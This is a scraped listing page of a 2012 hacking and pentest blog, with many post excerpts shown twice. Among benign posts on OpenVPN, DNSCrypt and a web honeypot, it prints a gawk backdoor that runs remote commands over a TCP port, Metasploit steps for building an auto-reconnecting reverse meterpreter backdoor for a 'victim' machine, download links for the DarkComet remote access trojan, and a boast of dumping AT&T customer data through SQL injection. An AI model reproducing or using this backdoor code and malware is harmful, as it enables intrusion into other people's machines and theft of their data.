Please download this app. from Source.
MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.
Source: http://packetstormsecurity.org/files/114693
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Showing posts with label pentest. Show all posts
Showing posts with label pentest. Show all posts
Friday, 13 July 2012
Thursday, 12 July 2012
A Backdoor in gawk by thegrugg
BEGIN {
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
Wednesday, 11 July 2012
Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges
This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.
Let us focus on our own and
Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS
================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
##
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
##
Tuesday, 10 July 2012
Howto: Use openvpn config files on Mac OS X
This post will tell you how to use openvpn and openvpn config file on Mac OSX
1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/
2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer
4. After Install completed, copy your openvpn config files to ~/Library
1. Download the Tunnelblick from http://code.google.com/p/tunnelblick/
2. Open the downloaded disk image file (which mounts the disk image).
3. Double click on Tunnelblick icon to install program, after that take the step of Tunnelblick installer
4. After Install completed, copy your openvpn config files to ~/Library
Saturday, 7 July 2012
DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1
This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
Monday, 2 July 2012
Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
If you want to see the exploit code, please go to the Source.
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
Using beef plugin with Metasploit
1. Run the beef service
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
Create Auto reconnect Backdoor With Metasploit
This post will show how to install the autoconnect backdoor in victim machine.
1. Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe
2. Binding receiving backdoor
1. Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe
2. Binding receiving backdoor
Wednesday, 27 June 2012
DNSCrypt - encrypts DNS traffic between your computer and OpenDNS
DNSCrypt, as its name suggests, encrypts DNS traffic between your computer and OpenDNS, in the same way SSL turns HTTP traffic into HTTPS encrypted traffic.
Initially, DNSCrypt was announced as being available for Mac only for now, but according to an OpenDNS article posted yesterday, the source code for DNSCrypt was published on GitHub when they've released the Mac preview and even though
Webhoneypot - Web Application Honeypot
DShield.org is offering this honeypot for users to capture automated web application exploits. It is a very simple "semi interactive" honeypot implemented in PHP.
Source: https://code.google.com/p/webhoneypot/
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Source: https://code.google.com/p/webhoneypot/
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Monday, 25 June 2012
finddomains - discovering domain names/web sites/virtual hosts
FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/
BoNeSi - the DDoS Botnet Simulator
If you want to see demo video of this tool, please go to the Source.
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
Saturday, 23 June 2012
AT&T And Hostgator was hack.
<==============================>Target: ATT.comVulnerable Link: REDACTEDVuln. Type: Error-BasedVulnerable paramater: sb=DB: prod<==============================>Well; it just goes to show you, anything is vulnerable. You just have to know where to look. This DB has A LOT of information in it: names, addresses, mobile numbersect.. The information in this dump isn't even 1% of whats in here, I just
Thursday, 21 June 2012
Browsers Anti-XSS methods in ASP (classic) have been defeated!
If you want to see full article,please go to the Source.
Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on
Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on